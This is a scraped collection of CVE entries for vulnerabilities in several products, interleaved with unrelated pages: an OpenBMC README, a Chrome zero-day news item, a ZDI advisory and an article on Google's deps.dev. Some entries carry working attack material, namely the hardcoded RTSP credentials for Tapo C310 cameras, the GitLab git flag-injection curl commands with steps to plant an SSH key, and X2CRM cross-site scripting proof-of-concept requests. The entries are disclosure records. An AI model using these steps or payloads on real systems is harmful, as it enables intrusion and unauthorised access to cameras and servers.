The Linux kernel before 6.2.9 has a race condition and resultant use-after-free in drivers/power/supply/da9150-charger.c if a physically proximate attacker unplugs a device.

CVE-2023-30772

A SQL injection vulnerability in I-Tech Trainsmart r1044 exists via a evaluation/assign-evaluation?id= URI.

The **Training System Monitoring and Reporting Tool (TrainSMART)** is an open-source, web-based training data collection system. It allows users to accurately track data about training programs, trainers, and trainees, to better evaluate programs and report activities to stakeholders. In addition to capturing training and participant data, TrainSMART has a robust reporting module that allows users to run various automatic reports, as well as create and save customized reports that can be run at any interval.

The system is built on a MySQL database, and is accessible to any user with an Internet connection, even at dial-up speeds. Designed for ease of use from the ground up—even for users with limited computer experience—the data input interfaces are simple, intuitive, and match the paper forms on which the data is often first recorded. Moreover, the web interface is permission-based, which allows different user groups to see different facets of the website—administrators can configure user permissions; data entry staff can enter data but not query the database; managers can design and generate reports from the data; and stakeholders or funders can be granted a login to see a summary of activities or data.

Because TrainSMART is free, open-source software—developed using popular open-source tools: Linux, Apache, MySQL, and PHP (LAMP)—it is appropriate for use in resource-limited settings, and can be customized to meet specific agency needs.

TrainSMART has been deployed in more than 30 countries and scales effectively from small, institution-level deployments to national implementation.

CVE-2021-36520: TrainSMART

TP-Link Tapo C310 1.3.0 devices allow access to the RTSP video feed via credentials of User --- and Password TPL075526460603.

    # Exploit Title: Tapo C310 RTSP server v1.3.0- Unauthorised Video Stream Access# Date: 19th July 2022# Exploit Author: dsclee1# Vendor Homepage: tp-link.com# Software Link: http://download.tplinkcloud.com/firmware/Tapo_C310v1_en_1.3.0_Build_220328_Rel.64283n_u_1649923652150.bin# Version: 1.3.0# Tested on: Linux – running on camera# CVE : CVE-2022-37255These Tapo cameras work via an app. There is a facility on the app to set up a “Camera Account”, which adds user details for the RTSP server. Unfortunately if you don’t set up the user details on versions 1.3.0 and below there are default login details. I sourced these from the “cet” binary on the camera.You can gain unauthorised access to the RTSP stream using the following user details:User: ---Password: TPL075526460603

CVE-2022-37255: Tapo C310 RTSP Server 1.3.0 Unauthorized Video Stream Access ≈ Packet Storm

An issue was discovered in GitLab Community and Enterprise Edition before 11.11.8, 12 before 12.0.6, and 12.1 before 12.1.6. Gitaly allows injection of command-line flags. This sometimes leads to privilege escalation or remote code execution.

Skip to content

Open Issue created Jul 24, 2019 by **GitLab SecurityBot@gitlab-securitybot**Reporter

**Git flag injection - local file overwrite to remote code execution**

**HackerOne report #658013** by vakzz on 2019-07-24, assigned to hackerjuan:

**Summary**

The wiki_blobs scope of the Search API can be provided with an arbitrary ref parameter, allowing for additional flags to be injected into the git command.

For example the following API call:

    `curl --header "PRIVATE-TOKEN: $TOKEN" 'http://gitlab-vm.local/api/v4/projects/4/search?scope=wiki_blobs&search=page&ref=--output=/tmp/file'`  

The above will generate the following git command causing the the last commit log to be written to /tmp/file

        /opt/gitlab/embedded/bin/git --git-dir /var/opt/gitlab/git-data/repositories/@hashed/4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.wiki.git log --max-count=1 --output=/tmp/file  

**Steps to reproduce**

1.  Create a wiki new wiki page called page with the commit message controlled content
2.  Search for the wiki blob via the Search API, with the injected ref flag:

    curl --header "PRIVATE-TOKEN: $TOKEN" 'http://gitlab-vm.local/api/v4/projects/5/search?scope=wiki_blobs&search=page&ref=--output=/tmp/file'  

3.  See that the file has been created:

    git@gitlab-vm:~$ cat /tmp/file  
    commit f00f9538d29b176e9dfb2eb1bfe1eab190cad3d9  
    Author: Administrator <admin@example.com>  
    Date:   Wed Jul 24 13:08:51 2019 +0000
    
        controlled content  

**Impact**

This can be used to overwrite /var/opt/gitlab/.ssh/authorized_keys with an attackers key by following the above steps allowing remote access and code execution.

1.  Create a new rsa key
2.  Create a new wiki page setting the commit message to the rsa public key
3.  Run the Search API with ref=--output=/var/opt/gitlab/.ssh/authorized_keys
4.  ssh into gitlab using the created key:

    $ ssh git@gitlab-vm.local -i gitlab  
    Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-70-generic x86_64)  
    $ id  
    uid=998(git) gid=998(git) groups=998(git)
    
    $ cat /var/opt/gitlab/.ssh/authorized_keys  
    commit 00c8e52996654d02bcbdba47dc25ee73671cbfd6  
    Author: Administrator <admin@example.com>  
    Date:   Wed Jul 24 12:56:23 2019 +0000
    
        ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxsqkWZobL5DBOnM3rtE7ZDP4d9v0lABJRGJbovHHTNY2iH3x3pjjerPfLDO21Gkyfzn4J+x6O6GleMAB5nxnZRH7E44khfW6Ldql29Rv2Q/IYCsBSKxGT6RCOFusoRi1uHlQmexIh4gZkmPeFfDLTy70Xv3FpPLfKE/EiVOjuEtY9JUC4MVlPHaTzZ2HE4sZT5tvcm9YtSpjT2v0SMR8uCXcKMAx4Tsu/Un2N5UziXgtRF+vD0fRhNyKIkOtULwBgWkL5RE71vYbxOhviqTAld7r70TIWSzSUHcUewbMS5XcEdBwl3XI/9qzo+jOA0Ulf2bkkROpELBoHwfLdpu9p will@MacBook-Pro.local  

**What is the current _bug_ behavior?**

The ref param is passed directly to the git command without being sanitized.

**What is the expected _correct_ behavior?**

The ref param should be sanitized or used in a way that doesn't allow for flag injection

**Results of GitLab environment info**

    $ sudo gitlab-rake gitlab:env:info
    
    System information  
    System:		Ubuntu 16.04  
    Current User:	git  
    Using RVM:	no  
    Ruby Version:	2.6.3p62  
    Gem Version:	2.7.9  
    Bundler Version:1.17.3  
    Rake Version:	12.3.2  
    Redis Version:	3.2.12  
    Git Version:	2.21.0  
    Sidekiq Version:5.2.7  
    Go Version:	unknown
    
    GitLab information  
    Version:	12.1.0  
    Revision:	295480f4553  
    Directory:	/opt/gitlab/embedded/service/gitlab-rails  
    DB Adapter:	PostgreSQL  
    DB Version:	10.7  
    URL:		http://gitlab-vm.local  
    HTTP Clone URL:	http://gitlab-vm.local/some-group/some-project.git  
    SSH Clone URL:	git@gitlab-vm.local:some-group/some-project.git  
    Using LDAP:	no  
    Using Omniauth:	yes  
    Omniauth Providers:
    
    GitLab Shell  
    Version:	9.3.0  
    Repository storage paths:  
    - default: 	/var/opt/gitlab/git-data/repositories  
    GitLab Shell path:		/opt/gitlab/embedded/service/gitlab-shell  
    Git:		/opt/gitlab/embedded/bin/git  

**Impact**

An attacker can overwrite or create files with mostly controlled content, allowing them to gain remote ssh access to gitlab as the git user

CVE-2019-14944: Git flag injection - local file overwrite to remote code execution (#1801) · Issues · GitLab.org / gitaly · GitLab

kvmtool through 39181fc allows an out-of-bounds write, related to virtio/balloon.c and virtio/pci.c. This allows a guest OS user to execute arbitrary code on the host machine.

CVE-2021-45464: LKVM Escape

In OpenBMC 2.9, crafted IPMI messages allow an attacker to cause a denial of service to the BMC via the netipmid (IPMI lan+) interface.

**OpenBMC**

OpenBMC is a Linux distribution for management controllers used in devices such as servers, top of rack switches or RAID appliances. It uses Yocto, OpenEmbedded, systemd, and D-Bus to allow easy customization for your platform.

**Setting up your OpenBMC project****1) Prerequisite**

See the Yocto documentation for the latest requirements

**Ubuntu**

sudo apt install git python3-distutils gcc g++ make file wget \\
    gawk diffstat bzip2 cpio chrpath zstd lz4 bzip2

**Fedora**

sudo dnf install git python3 gcc g++ gawk which bzip2 chrpath cpio \\
    hostname file diffutils diffstat lz4 wget zstd rpcgen patch

**2) Download the source**

git clone https://github.com/openbmc/openbmc
cd openbmc

**3) Target your hardware**

Any build requires an environment set up according to your hardware target. There is a special script in the root of this repository that can be used to configure the environment as needed. The script is called setup and takes the name of your hardware target as an argument.

The script needs to be sourced while in the top directory of the OpenBMC repository clone, and, if run without arguments, will display the list of supported hardware targets, see the following example:

    $ . setup <machine> [build_dir]
    Target machine must be specified. Use one of:
    
    bletchley               mori                    s8036
    dl360poc                mtjade                  swift
    e3c246d4i               mtmitchell              tatlin-archive-x86
    ethanolx                nicole                  tiogapass
    evb-ast2500             olympus-nuvoton         transformers
    evb-ast2600             on5263m5                vegman-n110
    evb-npcm750             p10bmc                  vegman-rx20
    f0b                     palmetto                vegman-sx20
    fp5280g2                qcom-dc-scm-v1          witherspoon
    g220a                   quanta-q71l             witherspoon-tacoma
    gbs                     romed8hm3               x11spi
    greatlakes              romulus                 yosemitev2
    gsj                     s2600wf                 zaius
    kudo                    s6q
    lannister               s7106
    

Once you know the target (e.g. romulus), source the setup script as follows:

**4) Build**

bitbake obmc-phosphor-image

Additional details can be found in the docs repository.

**OpenBMC Development**

The OpenBMC community maintains a set of tutorials new users can go through to get up to speed on OpenBMC development out here

**Build Validation and Testing**

Commits submitted by members of the OpenBMC GitHub community are compiled and tested via our Jenkins server. Commits are run through two levels of testing. At the repository level the makefile make check directive is run. At the system level, the commit is built into a firmware image and run with an arm-softmmu QEMU model against a barrage of CI tests.

Commits submitted by non-members do not automatically proceed through CI testing. After visual inspection of the commit, a CI run can be manually performed by the reviewer.

Automated testing against the QEMU model along with supported systems are performed. The OpenBMC project uses the Robot Framework for all automation. Our complete test repository can be found here.

**Submitting Patches**

Support of additional hardware and software packages is always welcome. Please follow the contributing guidelines when making a submission. It is expected that contributions contain test cases.

**Bug Reporting**

Issues are managed on GitHub. It is recommended you search through the issues before opening a new one.

**Questions**

First, please do a search on the internet. There's a good chance your question has already been asked.

For general questions, please use the openbmc tag on Stack Overflow. Please review the discussion on Stack Overflow licensing before posting any code.

For technical discussions, please see contact info below for Discord and mailing list information. Please don't file an issue to ask a question. You'll get faster results by using the mailing list or Discord.

**Will OpenBMC run on my Acme Server Corp. XYZ5000 motherboard?**

This is a common question, particularly regarding boards from popular COTS (commercial off-the-shelf) vendors such as Supermicro and ASRock. You can see the list of supported boards by running . setup (with no further arguments) in the root of the OpenBMC source tree. Most of the platforms supported by OpenBMC are specialized servers operated by companies running large datacenters, but some more generic COTS servers are supported to varying degrees.

If your motherboard is not listed in the output of . setup it is not currently supported. Porting OpenBMC to a new platform is a non-trivial undertaking, ideally done with the assistance of schematics and other documentation from the manufacturer (it is not completely infeasible to take on a porting effort without documentation via reverse engineering, but it is considerably more difficult, and probably involves a greater risk of hardware damage).

**However**, even if your motherboard is among those listed in the output of . setup, there are two significant caveats to bear in mind. First, not all ports are equally mature -- some platforms are better supported than others, and functionality on some "supported" boards may be fairly limited. Second, support for a motherboard is not the same as support for a complete system -- in particular, fan control is critically dependent on not just the motherboard but also the fans connected to it and the chassis that the board and fans are housed in, both of which can vary dramatically between systems using the same board model. So while you may be able to compile and install an OpenBMC build on your system and get some basic functionality, rough edges (such as your cooling fans running continuously at full throttle) are likely.

**Features of OpenBMC****Feature List**

*   Host management: Power, Cooling, LEDs, Inventory, Events, Watchdog
*   Full IPMI 2.0 Compliance with DCMI
*   Code Update Support for multiple BMC/BIOS images
*   Web-based user interface
*   REST interfaces
*   D-Bus based interfaces
*   SSH based SOL
*   Remote KVM
*   Hardware Simulation
*   Automated Testing
*   User management
*   Virtual media

**Features In Progress**

*   OpenCompute Redfish Compliance
*   Verified Boot

**Features Requested but need help**

*   OpenBMC performance monitoring

**Finding out more**

Dive deeper into OpenBMC by opening the docs repository.

**Technical Steering Committee**

The Technical Steering Committee (TSC) guides the project. Members are:

*   Roxanne Clarke, IBM
*   Nancy Yuen, Google
*   Patrick Williams, Meta
*   Terry Duncan, Intel
*   Sagar Dharia, Microsoft
*   Samer El-Haj-Mahmoud, Arm

**Contact**

*   Mail: openbmc@lists.ozlabs.org https://lists.ozlabs.org/listinfo/openbmc
*   Discord: https://discord.gg/69Km47zH98

CVE-2021-39295: GitHub - openbmc/openbmc: OpenBMC Distribution

Google on Friday released out-of-band updates to resolve an actively exploited zero-day flaw in its Chrome web browser, making it the first such bug to be addressed since the start of the year.
Tracked as CVE-2023-2033, the high-severity vulnerability has been described as a type confusion issue in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been

Zero-Day / Browser Security

Google on Friday released out-of-band updates to resolve an actively exploited zero-day flaw in its Chrome web browser, making it the first such bug to be addressed since the start of the year.

Tracked as **CVE-2023-2033**, the high-severity vulnerability has been described as a type confusion issue in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on April 11, 2023.

"Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page," according to the NIST's National Vulnerability Database (NVD).

The tech giant acknowledged that "an exploit for CVE-2023-2033 exists in the wild," but stopped short of sharing additional technical specifics or indicators of compromise (IoCs) to prevent further exploitation by threat actors.

CVE-2023-2033 also appears to share similarities with CVE-2022-1096, CVE-2022-1364, CVE-2022-3723, and CVE-2022-4262 – four other actively abused type confusion flaws in V8 that were remediated by Google in 2022.

UPCOMING WEBINAR

Master the Art of Dark Web Intelligence Gathering

Learn the art of extracting threat intelligence from the dark web – Join this expert-led webinar!

Save My Seat!

Google closed out a total of nine zero days in Chrome last year. The development comes days after Citizen Lab and Microsoft disclosed the exploitation of a now-patched flaw in Apple iOS by customers of a shadowy spyware vendor named QuaDream to target journalists, political opposition figures, and an NGO worker in 2021.

Users are recommended to upgrade to version 112.0.5615.121 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Releases Urgent Chrome Update to Fix Actively Exploited Zero-Day Vulnerability

X2CRM Open Source Sales CRM 6.6 and 6.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Create Action function, aka an index.php/actions/update URI.

    # Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: Actions[subject]# CVE: CVE-2022-48178# Date: 27.12.2022'''POC REQUEST:========POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 172Origin: http://localhostConnection: closeReferer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsrSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originYII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=testEXPLOITATION========1. Create an action2. Inject payload to the vulnerable parameter in POST requestPayload: %3Cscript%3Ealert(1)%3C%2Fscript%3E'''# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: model# CVE: Use CVE-2022-48177# Date: 27.12.2022'''POC REQUEST:========GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1EXPLOITATION========1. Select Import Records Model in admin settings2. Inject payload to the vulnerable parameter in GET requestPayload: "><body onload="alert(4)">'''

CVE-2022-48178: X2CRM 6.6 / 6.9 Cross Site Scripting ≈ Packet Storm

A flaw was found in the Linux kernel's udmabuf device driver. The specific flaw exists within a fault handler. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an array. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel.

April 13th, 2023

**Linux Kernel udmabuf Improper Validation of Array Index Local Privilege Escalation Vulnerability****ZDI-23-441  
ZDI-CAN-17639**

CVE ID

CVE-2023-2008

CVSS SCORE

8.2, (AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

AFFECTED VENDORS

Linux  

AFFECTED PRODUCTS

Kernel  

VULNERABILITY DETAILS

This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within a fault handler. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an array. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel.  

ADDITIONAL DETAILS

Linux has issued an update to correct this vulnerability. More details can be found at:  
https://github.com/torvalds/linux/commit/05b252cccb2e5c3f56119d25de684b4f810ba4  

DISCLOSURE TIMELINE

*   2022-06-17 - Vulnerability reported to vendor
*   2023-04-13 - Coordinated public release of advisory

CREDIT

Manuel Blanco Parajón; Eloi Sanfelix  

BACK TO ADVISORIES

CVE-2023-2008: ZDI-23-441

Google has opened up its software-dependency database, adding to the security data available to developers and toolmakers. Now developers need to use it.

Developers interested in gauging the security of open source components have an abundant number of choices, but they still have to choose to use the information to audit the components in their applications, experts say.

On April 11, Google announced its deps.dev API service, which includes security metadata that covers more than 5 million components across five software ecosystems, including the main open source repositories for Go, Java, Python, JavaScript, and Rust. The data is accessible through both the company's deps.dev website and a dataset that can be queried through a new API.

Developers can use the information to help choose packages, integrated development environments (IDEs) could offer security metrics as a developer works, and application-security tool makers could add the information to the list of sources they use to offer verdicts on the security and maintainability of open source software components, says Nicky Ringland, product manager for Google's Open Source Security Team.

"It could also mean looking at reporting after the fact ... and perhaps discovering some dependency challenges that they need to address," she says. "Ultimately, being able to check a potentially very large set of dependencies across multiple language ecosystems for security or licensing issues, automated and at scale ... is a powerful tool that we hope will benefit the whole ecosystem."

The Google deps.dev service's release comes as software developers, application security firms, and the US government work to find ways to improve the security of the open source software ecosystem. The exploitation of vulnerabilities in the Log4j logging package for Java — which is expected to be an "endemic vulnerability," according to the US Department of Homeland Security's Cyber Safety Review Board (CSRB) — underscores the importance of not only minimizing vulnerabilities in open source packages, but also eliminating the use of vulnerable packages.

A variety of efforts are already underway to give open source projects more tools to improve security and communicate their own dependencies, but developers must make security a priority and use information to know which components to download, says Brian Fox, co-founder and chief technology officer of software security firm Sonatype. The firm discovered that when a developer "consumes" a software component that has a vulnerability, 96% of the time a fix was already available.

"In other words, the problem is not really about our open source projects doing a good job. The Log4j team turned a patch over Thanksgiving weekend — in days, right — probably faster than most companies would have been able to do the same for a commercial project," he says. "We need to do a better job. Organizations that are consuming open source are doing a terrible job of making these decisions."

**A Feast of Dependency Data**

Google's deps.dev service adds another source for developers to search for information on open source components, but it is far from the only one. Sonatype revamped its OSS Index in 2018, modernizing the service to provide access to security and maintenance data on millions of software projects from 14 different ecosystems, such as the RubyGems package system for Ruby and the RPM Package Manager for Linux, in addition to the five covered by Google.

Other services, such as OpenText's Debricked, also offer a view into their own dependency datasets, tagging the projects and offering measures of popularity, contributor activity, and security.

The data should allow any developer to make better decisions but also give toolmakers another source of data to improve their guidance for software programmers, says Google's Ringland.

"Our intent for the API is that it is usable for anything from quick one-off scripts to complex tooling, like editor plug-ins or build system integrations," she says. "We see real appetite for this data — in everything from IDEs to CI/CD systems to audit dashboards — and are excited to be bringing critical security information to developers, CISOs, open source maintainers, and more."

Endor Labs, which focuses on helping developers make better choices using software dependency data, already uses deps.dev as one of its sources, but it lauded the more streamlined database access. Endor Labs pairs such data with extensive analysis to minimize false positives, such as when an application uses an open source library but not the vulnerable functions in that library.

The company also intends to make its own dependency information more accessible through DroidGPT, a ChatGPT-based service that makes risk data searchable in a conversational way, says Varun Badhwar, CEO and co-founder of Endor Labs. The goal is to reduce the amount of work to select and manage open source dependencies because selecting the wrong ones can create a great deal of future work — otherwise known as technical debt.

"Technical debt is typically created when developers are asked to constantly patch and fix vulnerabilities in open source code, despite most of that code not actually being in use," Badhwar says. "The way to reduce technical debt with OSS is by selecting better dependencies and prioritizing risk that actually matters."

**SBOM + Dependency Data = Better Software Security**

The dependency data will really start to be useful as developers and toolmakers begin combining the data with the software bill of materials (SBOMs) that are increasingly being created by development tools.

SBOMs can help organizations and development teams by illuminating their use of open source libraries, such as whether they are using five different encryption libraries or 12 loggers, says Sonatype's Fox.

"They have that shock moment when they realize they're using a dozen, 15 different components that all do the same thing," Fox says. By combining SBOMs and security data, "I can look at the whole entirety of my portfolio and start reasoning about it."

Adding security data to that allows companies to make better choices about how to streamline their software selection, and tools — such as the publicly available Security Scorecard — or commercial services can help, Endor Labs' Badhwar says.

"As the effort starts to span multiple teams and requires much engineering effort, and as they look to start reducing development effort on false positive security alerts, companies will find better ROI with \[these\] tools," he says.

Tag

#linux